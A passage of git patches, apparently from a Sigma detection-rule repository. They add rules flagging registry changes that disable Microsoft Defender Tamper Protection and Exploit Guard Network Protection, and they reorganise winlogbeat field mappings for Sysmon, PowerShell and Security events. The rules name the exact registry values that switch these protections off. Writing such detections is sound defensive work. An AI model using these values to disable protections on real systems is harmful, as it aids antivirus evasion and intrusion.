diff --git a/rules/windows/registry_event/sysmon_disabled_pua_protection_on_microsoft_defender.yml b/rules/windows/registry_event/sysmon_disabled_pua_protection_on_microsoft_defender.yml index 7486226a..f0ad69f8 100644 --- a/rules/windows/registry_event/sysmon_disabled_pua_protection_on_microsoft_defender.yml +++ b/rules/windows/registry_event/sysmon_disabled_pua_protection_on_microsoft_defender.yml @@ -8,6 +8,7 @@ references: - https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html tags: - attack.defense_evasion + - attack.t1562.001 logsource: category: registry_event product: windows From ff7fb4e4d226fa2062a305ac3a73d5bb8f8e7b89 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 4 Aug 2021 19:08:10 -0500 Subject: [PATCH 0174/1367] Create sysmon_disabled_tamper_protection_on_microsoft_defender.yml --- ...amper_protection_on_microsoft_defender.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/windows/registry_event/sysmon_disabled_tamper_protection_on_microsoft_defender.yml diff --git a/rules/windows/registry_event/sysmon_disabled_tamper_protection_on_microsoft_defender.yml b/rules/windows/registry_event/sysmon_disabled_tamper_protection_on_microsoft_defender.yml new file mode 100644 index 00000000..5b8a2d00 --- /dev/null +++ b/rules/windows/registry_event/sysmon_disabled_tamper_protection_on_microsoft_defender.yml @@ -0,0 +1,23 @@ +title: Disable Tamper Protection on Windows Defender +id: 93d298a1-d28f-47f1-a468-d971e7796679 +description: Detects disabling Windows Defender Tamper Protection +status: experimental +date: 2021/08/04 +author: Austin Songer @austinsonger +references: + - https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html +tags: + - attack.defense_evasion + - attack.t1562.001 +logsource: + category: registry_event + product: windows +detection: + selection: + EventType: SetValue + TargetObject|contains: 'HKLM\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection' + Details: 'DWORD (0)' + condition: selection +falsepositives: + - Unknown +level: medium From 483dacb209232e38d8a1e2ac3d80598ab61cf26c Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 4 Aug 2021 19:11:00 -0500 Subject: [PATCH 0175/1367] Create sysmon_disabled_exploit_guard_network_protection_on_microsoft_defender.yml --- ...twork_protection_on_microsoft_defender.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/windows/registry_event/sysmon_disabled_exploit_guard_network_protection_on_microsoft_defender.yml diff --git a/rules/windows/registry_event/sysmon_disabled_exploit_guard_network_protection_on_microsoft_defender.yml b/rules/windows/registry_event/sysmon_disabled_exploit_guard_network_protection_on_microsoft_defender.yml new file mode 100644 index 00000000..05d71751 --- /dev/null +++ b/rules/windows/registry_event/sysmon_disabled_exploit_guard_network_protection_on_microsoft_defender.yml @@ -0,0 +1,23 @@ +title: Disable Exploit Guard Network Protection on Windows Defender +id: bf9e1387-b040-4393-9851-1598f8ecfae9 +description: Detects disabling Windows Defender Exploit Guard Network Protection +status: experimental +date: 2021/08/04 +author: Austin Songer @austinsonger +references: + - https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html +tags: + - attack.defense_evasion + - attack.t1562.001 +logsource: + category: registry_event + product: windows +detection: + selection: + EventType: SetValue + TargetObject|contains: 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\App and Browser protection\DisallowExploitProtectionOverride' + Details: 'DWORD (00000001)' + condition: selection +falsepositives: + - Unknown +level: medium From 1d1b58d712e03160a9e566b4dcbd49ffbecb5e9b Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 5 Aug 2021 10:54:58 +0200 Subject: [PATCH 0176/1367] add sysmon mapping --- tools/config/generic/sysmon.yml | 5 +- tools/config/winlogbeat-modules-enabled.yml | 199 +++++++++++++------- 2 files changed, 138 insertions(+), 66 deletions(-) diff --git a/tools/config/generic/sysmon.yml b/tools/config/generic/sysmon.yml index 46d3c39b..a5aaac02 100644 --- a/tools/config/generic/sysmon.yml +++ b/tools/config/generic/sysmon.yml @@ -167,4 +167,7 @@ logsources: category: sysmon_error product: windows conditions: - EventID: 255 \ No newline at end of file + EventID: 255 + rewrite: + product: windows + service: sysmon \ No newline at end of file diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml index e164ff6c..9a6ba374 100644 --- a/tools/config/winlogbeat-modules-enabled.yml +++ b/tools/config/winlogbeat-modules-enabled.yml @@ -114,30 +114,12 @@ fieldmappings: AuditPolicyChanges: winlog.event_data.AuditPolicyChanges AuthenticationPackageName: winlog.event_data.AuthenticationPackageName CallingProcessName: winlog.event_data.CallingProcessName - CallTrace: winlog.event_data.CallTrace Channel: winlog.channel - CommandLine: process.command_line ComputerName: winlog.ComputerName - CurrentDirectory: process.working_directory - Description: winlog.event_data.Description - DestinationHostname: destination.domain - DestinationIp: destination.ip - dst_ip: destination.ip - #DestinationIsIpv6: winlog.event_data.DestinationIsIpv6 #=gets deleted and not boolean...https://github.com/elastic/beats/blob/71eee76e7cfb8d5b18dfacad64864370ddb14ce7/x-pack/winlogbeat/module/sysmon/config/winlogbeat-sysmon.js#L278-L279 - DestinationPort: destination.port - dst_port: destination.port - DestinationPortName: network.protocol - Details: winlog.event_data.Details - EngineVersion: winlog.event_data.EngineVersion EventType: winlog.event_data.EventType FailureCode: winlog.event_data.FailureCode FileName: file.path - GrantedAccess: winlog.event_data.GrantedAccess - file_hash: winlog.event_data.Hashes HiveName: winlog.event_data.HiveName - HostVersion: winlog.event_data.HostVersion - Image: process.executable - ImageLoaded: file.path IpAddress: source.ip IpPort: source.port KeyLength: winlog.event_data.KeyLength @@ -148,44 +130,24 @@ fieldmappings: ObjectName: winlog.event_data.ObjectName ObjectType: winlog.event_data.ObjectType ObjectValueName: winlog.event_data.ObjectValueName - ParentCommandLine: process.parent.command_line ParentProcessName: process.parent.name - ParentImage: process.parent.executable Path: winlog.event_data.Path - PipeName: file.name ProcessCommandLine: winlog.event_data.ProcessCommandLine ProcessName: process.executable - Product: winlog.event_data.Product Properties: winlog.event_data.Properties - RuleName: winlog.event_data.RuleName - ScriptBlockText: powershell.file.script_block_text SecurityID: winlog.event_data.SecurityID ServiceFileName: winlog.event_data.ServiceFileName ShareName: winlog.event_data.ShareName - Signature: winlog.event_data.Signature Source: winlog.event_data.Source - SourceHostname: source.domain - SourceImage: process.executable - SourceIp: source.ip - src_ip: source.ip - SourcePort: source.port - src_port: source.port - #SourceIsIpv6: winlog.event_data.SourceIsIpv6 #=gets deleted and not boolean...https://github.com/elastic/beats/blob/71eee76e7cfb8d5b18dfacad64864370ddb14ce7/x-pack/winlogbeat/module/sysmon/config/winlogbeat-sysmon.js#L278-L279 - StartModule: winlog.event_data.StartModule - State: winlog.event_data.State Status: winlog.event_data.Status SubjectDomainName: user.domain SubjectUserName: user.name SubjectUserSid: user.id - TargetFilename: file.path - TargetImage: winlog.event_data.TargetImage - TargetObject: registry.path TicketEncryptionType: winlog.event_data.TicketEncryptionType TicketOptions: winlog.event_data.TicketOptions TargetDomainName: user.domain TargetUserName: user.name TargetUserSid: user.id - User: user.name WorkstationName: source.domain # Channel: WLAN-Autoconfig AND EventID: 8001 AuthenticationAlgorithm: winlog.event_data.AuthenticationAlgorithm @@ -200,17 +162,6 @@ fieldmappings: PHYType: winlog.event_data.PHYType ProfileName: winlog.event_data.ProfileName SSID: winlog.event_data.SSID - # powershell - SequenceNumber: event.sequence - NewEngineState: powershell.engine.new_state - PreviousEngineState: powershell.engine.previous_state - NewProviderState: powershell.provider.new_state - ProviderName: powershell.provider.name - HostId: process.entity_id - HostApplication: process.command_line - HostName: process.title - Payload: winlog.event_data.Payload - ContextInfo: winlog.event_data.ContextInfo # from here missing field at 20210706 Accesses: winlog.event_data.Accesses AccessList: winlog.event_data.AccessList @@ -220,32 +171,23 @@ fieldmappings: CallerProcessName: winlog.event_data.CallerProcessName ClassName: winlog.event_data.ClassName ClassId: winlog.event_data.ClassId - Company: winlog.event_data.Company DestAddress: winlog.event_data.DestAddress Destination: process.executable - DestinationIsIpv6: winlog.event_data.DestinationIsIpv6 DestPort: destination.port - Device: file.path DeviceDescription: winlog.event_data.DeviceDescription # DeviceName => Microsoft-Windows-Ntfs EventID: 98 DeviceName: winlog.event_data.DeviceName # ErrorCode => printservice-admin EventID: 4909 or 808 ErrorCode: winlog.event_data.ErrorCode FilePath: winlog.event_data.FilePath - FileVersion: winlog.event_data.FileVersion # Filename => product: antivirus Filename: winlog.event_data.Filename - Initiated: winlog.event_data.Initiated - IntegrityLevel: winlog.event_data.IntegrityLevel LayerRTID: winlog.event_data.LayerRTID LDAPDisplayName: winlog.event_data.LDAPDisplayName # Level => Source: MSExchange Control Panel EventID: 4 Level: winlog.event_data.Level - LogonId: winlog.event_data.LogonId - NewName: winlog.event_data.NewName NewValue: winlog.event_data.NewValue ObjectServer: winlog.event_data.ObjectServer - OriginalFileName: process.pe.original_file_name PasswordLastSet: winlog.event_data.PasswordLastSet PrivilegeList: winlog.event_data.PrivilegeList QueryName: dns.question.name @@ -256,11 +198,8 @@ fieldmappings: Service: winlog.event_data.Service ServicePrincipalNames: winlog.event_data.ServicePrincipalNames SidHistory: winlog.event_data.SidHistory - Signed: winlog.event_data.Signed SourceAddress: source.ip - StartFunction: winlog.event_data.StartFunction SubjectLogonId: winlog.event_data.SubjectLogonId - TargetFileName: file.path TargetProcessAddress: winlog.event_data.TargetProcessAddress TargetServerName: winglog.event_data.TargetServerName TargetLogonId: winlog.event_data.TargetLogonId @@ -268,6 +207,104 @@ fieldmappings: # UserName => smbclient-security eventid:31017 UserName: winlog.event_data.UserName Workstation: winlog.event_data.Workstation + # + # Sysmon/Operational up to ID 25 + # + RuleName: winlog.event_data.RuleName + ProcessGuid: process.entity_id + ProcessId: process.pid + Image: process.executable + FileVersion: + category=process_creation: process.pe.file_version + category=image_load: process.pe.file_version + default: winlog.event_data.FileVersion + Description: + category=process_creation: process.pe.description + category=image_load: process.pe.description + category=sysmon_error: winlog.event_data.Description + default: winlog.event_data.Description + Product: + category=process_creation: process.pe.product + category=image_load: process.pe.product + default: winlog.event_data.Product + Company: + category=process_creation: process.pe.company + category=image_load: process.pe.company + default: winlog.event_data.Company + OriginalFileName: process.pe.original_file_name + CommandLine: + category=process_creation: process.command_line + service=powershell-classic: powershell.command.value + default: winlog.event_data.CommandLine + CurrentDirectory: process.working_directory + LogonGuid: winlog.event_data.LogonGuid + LogonId: winlog.event_data.LogonId + TerminalSessionId: winlog.event_data.TerminalSessionId + IntegrityLevel: winlog.event_data.IntegrityLevel + ParentProcessGuid: process.parent.entity_id + ParentProcessId: process.parent.pid + ParentImage: process.parent.executable + ParentCommandLine: process.parent.command_line + TargetFilename: file.path + CreationUtcTime: winlog.event_data.CreationUtcTime + PreviousCreationUtcTime: winlog.event_data.PreviousCreationUtcTime + Protocol: network.transport + Initiated: + category=network_connection: network.direction + default: winlog.event_data.Initiated + #SourceIsIpv6: winlog.event_data.SourceIsIpv6 #=gets deleted and not boolean...https://github.com/elastic/beats/blob/71eee76e7cfb8d5b18dfacad64864370ddb14ce7/x-pack/winlogbeat/module/sysmon/config/winlogbeat-sysmon.js#L278-L279 + SourceIp: source.ip + SourceHostname: source.domain + SourcePort: source.port + SourcePortName: winlog.event_data.SourcePortName + #DestinationIsIpv6: winlog.event_data.DestinationIsIpv6 #=gets deleted and not boolean...https://github.com/elastic/beats/blob/71eee76e7cfb8d5b18dfacad64864370ddb14ce7/x-pack/winlogbeat/module/sysmon/config/winlogbeat-sysmon.js#L278-L279 + DestinationIp: destination.ip + DestinationHostname: destination.domain + DestinationPort: destination.port + DestinationPortName: network.protocol + State: winlog.event_data.State + Version: winlog.event_data.Version + SchemaVersion: winlog.event_data.SchemaVersion + ImageLoaded: file.path + Signed: file.code_signature.signed + Signature: file.code_signature.subject_name + SignatureStatus: file.code_signature.status + SourceProcessGuid: process.entity_id + SourceProcessId: process.pid + SourceImage: process.executable + TargetProcessGuid: winlog.event_data.TargetProcessGuid + TargetProcessId: winlog.event_data.TargetProcessId + TargetImage: winlog.event_data.TargetImage + NewThreadId: winlog.event_data.NewThreadId + StartAddress: winlog.event_data.StartAddress + StartModule: winlog.event_data.StartModule + StartFunction: winlog.event_data.StartFunction + Device: file.path + SourceThreadId: process.thread.id + GrantedAccess: winlog.event_data.GrantedAccess + CallTrace: winlog.event_data.CallTrace + TargetObject: registry.path + Details: winlog.event_data.Details + NewName: winlog.event_data.NewName + Configuration: winlog.event_data.Configuration + ConfigurationFileHash: winlog.event_data.ConfigurationFileHash + PipeName: file.name + User: winlog.event_data.User + EventNamespace: winlog.event_data.EventNamespace + Name: winlog.event_data.Name + Query: winlog.event_data.Query + Operation: winlog.event_data.Operation + Type: winlog.event_data.Type + Destination: process.executable + Consumer: winlog.event_data.Consumer + Filter: winlog.event_data.Filter + QueryName: dns.question.name + QueryStatus: sysmon.dns.status + QueryResults: winlog.event_data.QueryResults + IsExecutable: sysmon.file.is_executable + Archived: sysmon.file.archived + Session: winlog.event_data.Session + ClientInfo: winlog.event_data.ClientInfo # SYSMON Hashes Hashes: winlog.event_data.Hashes # extraction from Hashes NOT a original field but find in some rule @@ -287,10 +324,42 @@ fieldmappings: category=driver_load: hash.imphash category=image_load: file.hash.imphash default: process.pe.imphash - #security 7045 - ServiceName: - service=security: winlog.event_data.ServiceName - default: service.name + # + # Powershell + # + CommandName: powershell.command.name + CommandPath: powershell.command.path + CommandType: powershell.command.type + EngineVersion: + service=powershell-classic: powershell.engine.version + default: winlog.event_data.EngineVersion + HostApplication: process.command_line + HostId: process.entity_id + HostName: process.title + HostVersion: + service=powershell-classic: powershell.process.executable_version + default: winlog.event_data.HostVersion + NewEngineState: powershell.engine.new_state + PipelineId: powershell.pipeline_id + PreviousEngineState: powershell.engine.previous_state + RunspaceId: powershell.runspace_id + ScriptName: file.path + SequenceNumber: event.sequence + NewProviderState: powershell.provider.new_state + ProviderName: powershell.provider.name + Payload: winlog.event_data.Payload + ContextInfo: winlog.event_data.ContextInfo + MessageNumber: powershell.sequence + MessageTotal: powershell.total + ScriptBlockText: powershell.file.script_block_text + ScriptBlockId: powershell.file.script_block_id + # + # Security + # + #EventID 7045 + ServiceName: + service=security: service.name + default: winlog.event_data.ServiceName ImagePath: winlog.event_data.ImagePath ServiceType: winlog.event_data.ServiceType StartType: winlog.event_data.ServiceStartType From ac43eecc3634585e002b113493d455cdd9e1c1dc Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 5 Aug 2021 11:20:22 +0200 Subject: [PATCH 0177/1367] Add eventid 4624 --- tools/config/winlogbeat-modules-enabled.yml | 52 +++++++++++++-------- 1 file changed, 33 insertions(+), 19 deletions(-) diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml index 9a6ba374..64ad4fcd 100644 --- a/tools/config/winlogbeat-modules-enabled.yml +++ b/tools/config/winlogbeat-modules-enabled.yml @@ -107,24 +107,18 @@ defaultindex: winlogbeat-* # Keep EventID! Clean up the list afterwards! fieldmappings: EventID: event.code + Channel: winlog.channel AccessMask: winlog.event_data.AccessMask AccountName: winlog.event_data.AccountName AllowedToDelegateTo: winlog.event_data.AllowedToDelegateTo AttributeLDAPDisplayName: winlog.event_data.AttributeLDAPDisplayName AuditPolicyChanges: winlog.event_data.AuditPolicyChanges - AuthenticationPackageName: winlog.event_data.AuthenticationPackageName CallingProcessName: winlog.event_data.CallingProcessName - Channel: winlog.channel ComputerName: winlog.ComputerName EventType: winlog.event_data.EventType FailureCode: winlog.event_data.FailureCode FileName: file.path HiveName: winlog.event_data.HiveName - IpAddress: source.ip - IpPort: source.port - KeyLength: winlog.event_data.KeyLength - LogonProcessName: winlog.event_data.LogonProcessName - LogonType: winlog.event_data.LogonType NewProcessName: winlog.event_data.NewProcessName ObjectClass: winlog.event_data.ObjectClass ObjectName: winlog.event_data.ObjectName @@ -133,22 +127,17 @@ fieldmappings: ParentProcessName: process.parent.name Path: winlog.event_data.Path ProcessCommandLine: winlog.event_data.ProcessCommandLine - ProcessName: process.executable Properties: winlog.event_data.Properties SecurityID: winlog.event_data.SecurityID ServiceFileName: winlog.event_data.ServiceFileName ShareName: winlog.event_data.ShareName Source: winlog.event_data.Source Status: winlog.event_data.Status - SubjectDomainName: user.domain - SubjectUserName: user.name - SubjectUserSid: user.id TicketEncryptionType: winlog.event_data.TicketEncryptionType TicketOptions: winlog.event_data.TicketOptions TargetDomainName: user.domain TargetUserName: user.name TargetUserSid: user.id - WorkstationName: source.domain # Channel: WLAN-Autoconfig AND EventID: 8001 AuthenticationAlgorithm: winlog.event_data.AuthenticationAlgorithm BSSID: winlog.event_data.BSSID @@ -167,12 +156,10 @@ fieldmappings: AccessList: winlog.event_data.AccessList AttributeValue: winlog.event_data.AttributeValue AuditSourceName: winlog.event_data.AuditSourceName - AuthenticationPackage: winlog.event_data.AuthenticationPackageName CallerProcessName: winlog.event_data.CallerProcessName ClassName: winlog.event_data.ClassName ClassId: winlog.event_data.ClassId DestAddress: winlog.event_data.DestAddress - Destination: process.executable DestPort: destination.port DeviceDescription: winlog.event_data.DeviceDescription # DeviceName => Microsoft-Windows-Ntfs EventID: 98 @@ -190,19 +177,14 @@ fieldmappings: ObjectServer: winlog.event_data.ObjectServer PasswordLastSet: winlog.event_data.PasswordLastSet PrivilegeList: winlog.event_data.PrivilegeList - QueryName: dns.question.name - QueryResults: winlog.event_data.QueryResults - QueryStatus: sysmon.dns.status RelativeTargetName: winlog.event_data.RelativeTargetName SamAccountName: winlog.event_data.SamAccountName Service: winlog.event_data.Service ServicePrincipalNames: winlog.event_data.ServicePrincipalNames SidHistory: winlog.event_data.SidHistory SourceAddress: source.ip - SubjectLogonId: winlog.event_data.SubjectLogonId TargetProcessAddress: winlog.event_data.TargetProcessAddress TargetServerName: winglog.event_data.TargetServerName - TargetLogonId: winlog.event_data.TargetLogonId TaskName: winlog.event_data.TaskName # UserName => smbclient-security eventid:31017 UserName: winlog.event_data.UserName @@ -356,6 +338,38 @@ fieldmappings: # # Security # + SubjectUserSid: user.id + SubjectUserName: user.name + SubjectDomainName: user.domain + SubjectLogonId: + service=security: winlog.logon.id + default: winlog.event_data.SubjectLogonId + #EventID 4610 + AuthenticationPackageName: winlog.event_data.AuthenticationPackageName + #EventID 4611 + LogonProcessName: winlog.event_data.LogonProcessName + #EventID 4616 + PreviousTime: winlog.event_data.PreviousTime + NewTime: winlog.event_data.NewTime + #EventID 4624 + TargetLogonId: + service=security: winlog.logon.id + default: winlog.event_data.TargetLogonId + LogonType: winlog.event_data.LogonType + WorkstationName: source.domain + TransmittedServices: winlog.event_data.TransmittedServices + LmPackageName: winlog.event_data.LmPackageName + KeyLength: winlog.event_data.KeyLength + ProcessName: process.executable + IpAddress: source.ip + IpPort: source.port + ImpersonationLevel: winlog.event_data.ImpersonationLevel + RestrictedAdminMode: winlog.event_data.RestrictedAdminMode + TargetOutboundUserName: winlog.event_data.TargetOutboundUserName + TargetOutboundDomainName: winlog.event_data.TargetOutboundDomainName + VirtualAccount: winlog.event_data.VirtualAccount + TargetLinkedLogonId: winlog.event_data.TargetLinkedLogonId + ElevatedToken: winlog.event_data.ElevatedToken #EventID 7045 ServiceName: service=security: service.name From 439b3cecc3f61a169fff277355a18fee0ebe4278 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 5 Aug 2021 13:31:39 +0200 Subject: [PATCH 0178/1367] Add most of security EventID --- tools/config/winlogbeat-modules-enabled.yml | 250 ++++++++++++++------ 1 file changed, 180 insertions(+), 70 deletions(-) diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml index 64ad4fcd..8fd145f2 100644 --- a/tools/config/winlogbeat-modules-enabled.yml +++ b/tools/config/winlogbeat-modules-enabled.yml @@ -108,36 +108,16 @@ defaultindex: winlogbeat-* fieldmappings: EventID: event.code Channel: winlog.channel - AccessMask: winlog.event_data.AccessMask - AccountName: winlog.event_data.AccountName - AllowedToDelegateTo: winlog.event_data.AllowedToDelegateTo - AttributeLDAPDisplayName: winlog.event_data.AttributeLDAPDisplayName - AuditPolicyChanges: winlog.event_data.AuditPolicyChanges CallingProcessName: winlog.event_data.CallingProcessName ComputerName: winlog.ComputerName EventType: winlog.event_data.EventType FailureCode: winlog.event_data.FailureCode FileName: file.path HiveName: winlog.event_data.HiveName - NewProcessName: winlog.event_data.NewProcessName - ObjectClass: winlog.event_data.ObjectClass - ObjectName: winlog.event_data.ObjectName - ObjectType: winlog.event_data.ObjectType - ObjectValueName: winlog.event_data.ObjectValueName - ParentProcessName: process.parent.name Path: winlog.event_data.Path ProcessCommandLine: winlog.event_data.ProcessCommandLine - Properties: winlog.event_data.Properties SecurityID: winlog.event_data.SecurityID - ServiceFileName: winlog.event_data.ServiceFileName - ShareName: winlog.event_data.ShareName Source: winlog.event_data.Source - Status: winlog.event_data.Status - TicketEncryptionType: winlog.event_data.TicketEncryptionType - TicketOptions: winlog.event_data.TicketOptions - TargetDomainName: user.domain - TargetUserName: user.name - TargetUserSid: user.id # Channel: WLAN-Autoconfig AND EventID: 8001 AuthenticationAlgorithm: winlog.event_data.AuthenticationAlgorithm BSSID: winlog.event_data.BSSID @@ -151,16 +131,9 @@ fieldmappings: PHYType: winlog.event_data.PHYType ProfileName: winlog.event_data.ProfileName SSID: winlog.event_data.SSID - # from here missing field at 20210706 Accesses: winlog.event_data.Accesses - AccessList: winlog.event_data.AccessList - AttributeValue: winlog.event_data.AttributeValue - AuditSourceName: winlog.event_data.AuditSourceName - CallerProcessName: winlog.event_data.CallerProcessName ClassName: winlog.event_data.ClassName ClassId: winlog.event_data.ClassId - DestAddress: winlog.event_data.DestAddress - DestPort: destination.port DeviceDescription: winlog.event_data.DeviceDescription # DeviceName => Microsoft-Windows-Ntfs EventID: 98 DeviceName: winlog.event_data.DeviceName @@ -169,26 +142,12 @@ fieldmappings: FilePath: winlog.event_data.FilePath # Filename => product: antivirus Filename: winlog.event_data.Filename - LayerRTID: winlog.event_data.LayerRTID LDAPDisplayName: winlog.event_data.LDAPDisplayName # Level => Source: MSExchange Control Panel EventID: 4 Level: winlog.event_data.Level - NewValue: winlog.event_data.NewValue - ObjectServer: winlog.event_data.ObjectServer - PasswordLastSet: winlog.event_data.PasswordLastSet - PrivilegeList: winlog.event_data.PrivilegeList - RelativeTargetName: winlog.event_data.RelativeTargetName - SamAccountName: winlog.event_data.SamAccountName - Service: winlog.event_data.Service - ServicePrincipalNames: winlog.event_data.ServicePrincipalNames - SidHistory: winlog.event_data.SidHistory - SourceAddress: source.ip TargetProcessAddress: winlog.event_data.TargetProcessAddress - TargetServerName: winglog.event_data.TargetServerName - TaskName: winlog.event_data.TaskName # UserName => smbclient-security eventid:31017 UserName: winlog.event_data.UserName - Workstation: winlog.event_data.Workstation # # Sysmon/Operational up to ID 25 # @@ -216,6 +175,7 @@ fieldmappings: OriginalFileName: process.pe.original_file_name CommandLine: category=process_creation: process.command_line + service=security: process.command_line service=powershell-classic: powershell.command.value default: winlog.event_data.CommandLine CurrentDirectory: process.working_directory @@ -230,7 +190,9 @@ fieldmappings: TargetFilename: file.path CreationUtcTime: winlog.event_data.CreationUtcTime PreviousCreationUtcTime: winlog.event_data.PreviousCreationUtcTime - Protocol: network.transport + Protocol: + category=network_connection: network.transport + default: winlog.event_data.Protocol Initiated: category=network_connection: network.direction default: winlog.event_data.Initiated @@ -338,42 +300,190 @@ fieldmappings: # # Security # - SubjectUserSid: user.id - SubjectUserName: user.name - SubjectDomainName: user.domain + AccessGranted: winlog.event_data.AccessGranted + AccessList: winlog.event_data.AccessList + AccessMask: winlog.event_data.AccessMask + AccessReason: winlog.event_data.AccessReason + AccessRemoved: winlog.event_data.AccessRemoved + AccountDomain: user.domain + AccountExpires: winlog.event_data.AccountExpires + AccountName: user.name + AdditionalInfo: winlog.event_data.AdditionalInfo + AdditionalInfo2: winlog.event_data.AdditionalInfo2 + AllowedToDelegateTo: winlog.event_data.AllowedToDelegateTo + AppCorrelationID: winlog.event_data.AppCorrelationID + Application: process.executable + AttributeLDAPDisplayName: winlog.event_data.AttributeLDAPDisplayName + AttributeSyntaxOID: winlog.event_data.AttributeSyntaxOID + AttributeValue: winlog.event_data.AttributeValue + AuditPolicyChanges: winlog.event_data.AuditPolicyChanges + AuditSourceName: winlog.event_data.AuditSourceName + AuthenticationPackageName: winlog.event_data.AuthenticationPackageName + CallerProcessId: winlog.event_data.CallerProcessId + CallerProcessName: winlog.event_data.CallerProcessName + CategoryId: winlog.event_data.CategoryId + CertIssuerName: winlog.event_data.CertIssuerName + CertSerialNumber: winlog.event_data.CertSerialNumber + CertThumbprint: winlog.event_data.CertThumbprint + ClientAddress: source.ip + ClientName: source.domain + ClientProcessId: winlog.event_data.ClientProcessId + ClientProcessStartKey: winlog.event_data.ClientProcessStartKey + ComputerAccountChange: winlog.event_data.ComputerAccountChange + CrashOnAuditFailValue: winlog.event_data.CrashOnAuditFailValue + DestAddress: destination.ip + DestPort: destination.port + Direction: winlog.event_data.Direction + DisplayName: winlog.event_data.DisplayName + DnsHostName: winlog.event_data.DnsHostName + DomainBehaviorVersion: winlog.event_data.DomainBehaviorVersion + DomainName: winlog.event_data.DomainName + DomainPolicyChanged: winlog.event_data.DomainPolicyChanged + DomainSid: winlog.event_data.DomainSid + DSName: winlog.event_data.DSName + DSType: winlog.event_data.DSType + Dummy: winlog.event_data.Dummy + ElevatedToken: winlog.event_data.ElevatedToken + EventSourceId: winlog.event_data.EventSourceId + FailureReason: winlog.event_data.FailureReason + FilterRTID: winlog.event_data.FilterRTID + ForceLogoff: winlog.event_data.ForceLogoff + FQDN: winlog.event_data.FQDN + GroupTypeChange: winlog.event_data.GroupTypeChange + HandleId: winlog.event_data.HandleId + HomeDirectory: winlog.event_data.HomeDirectory + HomePath: winlog.event_data.HomePath + ImagePath: winlog.event_data.ImagePath + ImpersonationLevel: winlog.event_data.ImpersonationLevel + IpAddress: source.ip + IpPort: source.port + KeyLength: winlog.event_data.KeyLength + LayerName: winlog.event_data.LayerName + LayerRTID: winlog.event_data.LayerRTID + LmPackageName: winlog.event_data.LmPackageName + LockoutDuration: winlog.event_data.LockoutDuration + LockoutObservationWindow: winlog.event_data.LockoutObservationWindow + LockoutThreshold: winlog.event_data.LockoutThreshold + LogonHours: winlog.event_data.LogonHours SubjectLogonId: service=security: winlog.logon.id default: winlog.event_data.SubjectLogonId - #EventID 4610 - AuthenticationPackageName: winlog.event_data.AuthenticationPackageName - #EventID 4611 LogonProcessName: winlog.event_data.LogonProcessName - #EventID 4616 - PreviousTime: winlog.event_data.PreviousTime - NewTime: winlog.event_data.NewTime - #EventID 4624 - TargetLogonId: - service=security: winlog.logon.id - default: winlog.event_data.TargetLogonId LogonType: winlog.event_data.LogonType - WorkstationName: source.domain - TransmittedServices: winlog.event_data.TransmittedServices - LmPackageName: winlog.event_data.LmPackageName - KeyLength: winlog.event_data.KeyLength + MachineAccountQuota: winlog.event_data.MachineAccountQuota + MandatoryLabel: winlog.event_data.MandatoryLabel + MasterKeyId: winlog.event_data.MasterKeyId + MaxPasswordAge: winlog.event_data.MaxPasswordAge + MemberName: winlog.event_data.MemberName + MemberSid: winlog.event_data.MemberSid + MinPasswordAge: winlog.event_data.MinPasswordAge + MinPasswordLength: winlog.event_data.MinPasswordLength + MixedDomainMode: winlog.event_data.MixedDomainMode + NewProcessId: process.pid + NewProcessName: process.executable + NewSd: winlog.event_data.NewSd + NewTargetUserName: winlog.event_data.NewTargetUserName + NewTime: winlog.event_data.NewTime + NewUacValue: winlog.event_data.NewUacValue + NewValue: winlog.event_data.NewValue + NewValueType: winlog.event_data.NewValueType + ObjectClass: winlog.event_data.ObjectClass + ObjectDN: winlog.event_data.ObjectDN + ObjectGUID: winlog.event_data.ObjectGUID + ObjectName: winlog.event_data.ObjectName + ObjectServer: winlog.event_data.ObjectServer + ObjectType: winlog.event_data.ObjectType + ObjectValueName: winlog.event_data.ObjectValueName + OemInformation: winlog.event_data.OemInformation + OldSd: winlog.event_data.OldSd + OldTargetUserName: winlog.event_data.OldTargetUserName + OldUacValue: winlog.event_data.OldUacValue + OldValue: winlog.event_data.OldValue + OldValueType: winlog.event_data.OldValueType + OpCorrelationID: winlog.event_data.OpCorrelationID + OperationType: winlog.event_data.OperationType + PackageName: winlog.event_data.PackageName + ParentProcessName: process.parent.name + PasswordHistoryLength: winlog.event_data.PasswordHistoryLength + PasswordLastSet: winlog.event_data.PasswordLastSet + PasswordProperties: winlog.event_data.PasswordProperties + PreAuthType: winlog.event_data.PreAuthType + PreviousTime: winlog.event_data.PreviousTime + PrimaryGroupId: winlog.event_data.PrimaryGroupId + PrivilegeList: winlog.event_data.PrivilegeList ProcessName: process.executable - IpAddress: source.ip - IpPort: source.port - ImpersonationLevel: winlog.event_data.ImpersonationLevel + ProfilePath: winlog.event_data.ProfilePath + Properties: winlog.event_data.Properties + PuaCount: winlog.event_data.PuaCount + PuaPolicyId: winlog.event_data.PuaPolicyId + RecoveryKeyId: winlog.event_data.RecoveryKeyId + RecoveryServer: winlog.event_data.RecoveryServer + RelativeTargetName: winlog.event_data.RelativeTargetName + RemoteMachineID: winlog.event_data.RemoteMachineID + RemoteUserID: winlog.event_data.RemoteUserID + ResourceAttributes: winlog.event_data.ResourceAttributes RestrictedAdminMode: winlog.event_data.RestrictedAdminMode - TargetOutboundUserName: winlog.event_data.TargetOutboundUserName - TargetOutboundDomainName: winlog.event_data.TargetOutboundDomainName - VirtualAccount: winlog.event_data.VirtualAccount - TargetLinkedLogonId: winlog.event_data.TargetLinkedLogonId - ElevatedToken: winlog.event_data.ElevatedToken - #EventID 